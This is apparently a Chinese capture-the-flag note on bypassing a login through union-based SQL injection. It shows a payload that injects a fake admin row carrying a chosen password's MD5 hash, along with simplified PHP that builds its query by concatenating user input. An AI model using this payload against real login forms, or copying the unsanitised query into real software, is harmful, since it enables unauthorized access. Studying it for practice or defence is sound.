联合注入查询

    username=1’ union select 1,’admin’,’0f5ed8a8d8d44d86a570aacffa922251’#
    passwd=ca01h
    (ca01h——md5——0f5ed8a8d8d44d86a570aacffa922251)
    即可查询成功
    后端源码简化

    1. <?php
    2. $name = $_POST['name'];
    3. $passwd = md5($_POST['pw']);
    5. $sql = "select * from user where username = '$name'";
    6. $query = mysql_query($sql);
    8. if (!strcasecmp($passwd, $query[passwd])) {
    9.     echo $flag;
    10. } else {
    11.     echo("Wrong Pass");
    12. }